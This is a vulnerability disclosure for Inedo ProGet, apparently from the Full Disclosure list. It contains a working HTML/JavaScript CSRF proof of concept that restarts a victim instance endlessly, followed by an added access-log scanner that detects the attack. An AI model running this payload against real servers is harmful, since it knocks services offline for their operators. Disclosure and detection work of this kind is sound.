Inedo ProGet 2024.22 and below are vulnerable to unauthenticated denial of
service and information disclosure attacks (among other things) because the
web application directly exposes the C# reflection used during its
request-to-action mapping and fails to properly protect certain code paths.
These issues are amplified by cross-site request forgery (CSRF): the
application does not verify the HTTP request method, so no CSRF protection
that depends on the method is ever applied. Specifically, unauthenticated
attackers can chain CSRF and reflection to cancel executions, restart the
ProGet instance, and perform certain other actions. The following sample
script demonstrates the vulnerability by restarting the victim ProGet instance
ad infinitum. Notably, the attack works regardless of browser pre-flight
protections: a cross-origin HEAD request with no custom headers is a CORS
"simple" request that the browser sends without a pre-flight, and even where a
pre-flight is sent, the OPTIONS request reaches the same handler, which ignores
the method. It is likely that more recent versions are also vulnerable. The
CSRF portion allows attacking internal (private) instances in addition to
directly accessible (e.g., public) instances. This vulnerability is known to
exist across multiple major versions.

<!DOCTYPE html>
<html lang="en">
<head>
<script>
function sleep(ms) {
  return new Promise(resolve => setTimeout(resolve, ms));
}
// One cross-origin HEAD request to the reflected RestartWeb action. HEAD with
// no custom headers is a CORS "simple" request, so the browser sends it
// without a pre-flight; the response is opaque to this page, but the request
// still reaches ProGet, which ignores the method and restarts.
function sendData() {
  var xhr = new XMLHttpRequest();
  xhr.open('HEAD',
    'http://vict.im/0x44/ProGet.WebApplication/Inedo.ProGet.WebApplication.Pages.Errors.UserNotFoundErrorPage/RestartWeb');
  xhr.send();
}
// Fire two requests every 500 ms, forever, so the instance never finishes
// coming back up before the next restart is requested.
async function executeDosAttack() {
  while (true) {
    try {
      sendData();
      sendData();
      // Sleep for 500 ms
      await sleep(500);
    } catch (ignoreMe) {
      // Gobble up exceptions since we expect the service to go down and
      // pre-flight triggers the shutdown anyway
    }
  }
}
</script>
</head>
<body onload="executeDosAttack()">
<h1>Insecure Reflection + CSRF + DOS Attack</h1>
<p>It's silently working in the background...</p>
</body>
</html>
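
From the defender's side, the chain above leaves a recognisable trace in the
web server's access log: requests to the reflected "page class/action" path
with a method other than POST, often with a Referer from another site, arriving
in a steady burst from one address. The following scanner is an added example
and is not part of the original post or of ProGet. It assumes Apache/nginx
"combined" log format, a victim host name of proget.example.internal, and a
handful of constructed log lines; only the path shape is taken from the PoC
above. Run it with node.

```javascript
// Added example (not from the advisory or from Inedo): flag access-log
// entries that match the reflected ProGet action path used in the PoC and
// look like the cross-site HEAD/OPTIONS chain.
//
// Assumptions (constructed for this example):
//  - Logs are in Apache/nginx "combined" format; adjust parseLine() for IIS.
//  - The victim host is "proget.example.internal".
//  - Any method other than POST on a reflected action path is suspicious,
//    because a browser can send GET/HEAD/OPTIONS cross-origin without a
//    pre-flight, which is exactly what the PoC relies on.

const VICTIM_HOST = "proget.example.internal";

// Shape of the reflected dispatch path from the PoC:
// /0x44/ProGet.WebApplication/<fully.qualified.PageClass>/<ActionName>
const REFLECTED_ACTION =
  /^\/0x44\/ProGet\.WebApplication\/(Inedo\.ProGet\.WebApplication\.[\w.]+)\/(\w+)$/;

// Combined log format:
// ip - user [time] "METHOD path HTTP/x.y" status bytes "referer" "user-agent"
const LINE_RE =
  /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "([^"]*)" "([^"]*)"/;

function parseLine(line) {
  const m = LINE_RE.exec(line);
  if (!m) return null;
  return { ip: m[1], time: m[2], method: m[3], path: m[4],
           status: Number(m[5]), referer: m[6], ua: m[7] };
}

function refererHost(referer) {
  if (!referer || referer === "-") return null;
  try { return new URL(referer).host; } catch { return null; }
}

// Returns null for non-reflected paths; otherwise a finding whose `reasons`
// list is empty when nothing about the request looks cross-site.
function classify(rec) {
  const m = REFLECTED_ACTION.exec(rec.path);
  if (!m) return null;
  const reasons = [];
  if (rec.method !== "POST") reasons.push(`non-POST method ${rec.method}`);
  const host = refererHost(rec.referer);
  if (host && host !== VICTIM_HOST) reasons.push(`cross-site referer ${host}`);
  return { ip: rec.ip, page: m[1], action: m[2], method: rec.method, reasons };
}

// Scan lines; report suspicious reflected-action hits and the sources that
// repeat them (the PoC fires two requests every 500 ms, so counts climb fast).
function scanLog(lines, burstThreshold = 4) {
  const findings = [];
  const perIp = new Map();
  for (const line of lines) {
    const rec = parseLine(line);
    if (!rec) continue;
    const f = classify(rec);
    if (!f || f.reasons.length === 0) continue;
    findings.push(f);
    perIp.set(f.ip, (perIp.get(f.ip) || 0) + 1);
  }
  const bursts = [...perIp]
    .filter(([, n]) => n >= burstThreshold)
    .map(([ip, n]) => ({ ip, count: n }));
  return { findings, bursts };
}

// Constructed sample log: one benign feed fetch, one same-origin POST to the
// action (not flagged), then a burst of cross-site HEADs and an OPTIONS.
const ACTION = "/0x44/ProGet.WebApplication/Inedo.ProGet.WebApplication.Pages.Errors.UserNotFoundErrorPage/RestartWeb";
const SAMPLE_LOG = [
  `10.0.0.5 - - [12/Jan/2025:10:00:00 +0000] "GET /feeds/NuGet HTTP/1.1" 200 4120 "-" "Mozilla/5.0"`,
  `10.0.0.5 - - [12/Jan/2025:10:00:01 +0000] "POST ${ACTION} HTTP/1.1" 200 - "http://proget.example.internal/administration" "Mozilla/5.0"`,
  `10.0.0.9 - - [12/Jan/2025:10:00:02 +0000] "HEAD ${ACTION} HTTP/1.1" 200 - "http://attacker.example/" "Mozilla/5.0"`,
  `10.0.0.9 - - [12/Jan/2025:10:00:02 +0000] "HEAD ${ACTION} HTTP/1.1" 200 - "http://attacker.example/" "Mozilla/5.0"`,
  `10.0.0.9 - - [12/Jan/2025:10:00:03 +0000] "HEAD ${ACTION} HTTP/1.1" 200 - "http://attacker.example/" "Mozilla/5.0"`,
  `10.0.0.9 - - [12/Jan/2025:10:00:03 +0000] "HEAD ${ACTION} HTTP/1.1" 200 - "http://attacker.example/" "Mozilla/5.0"`,
  `10.0.0.9 - - [12/Jan/2025:10:00:04 +0000] "OPTIONS ${ACTION} HTTP/1.1" 200 - "-" "Mozilla/5.0"`,
];

console.log(JSON.stringify(scanLog(SAMPLE_LOG), null, 2));
```

The same-origin POST is deliberately left unflagged: what distinguishes the
CSRF chain is the method and the foreign Referer, not the path itself, and a
HEAD or OPTIONS with no Referer at all (the last sample line) is still
reported because the method alone is enough.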

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/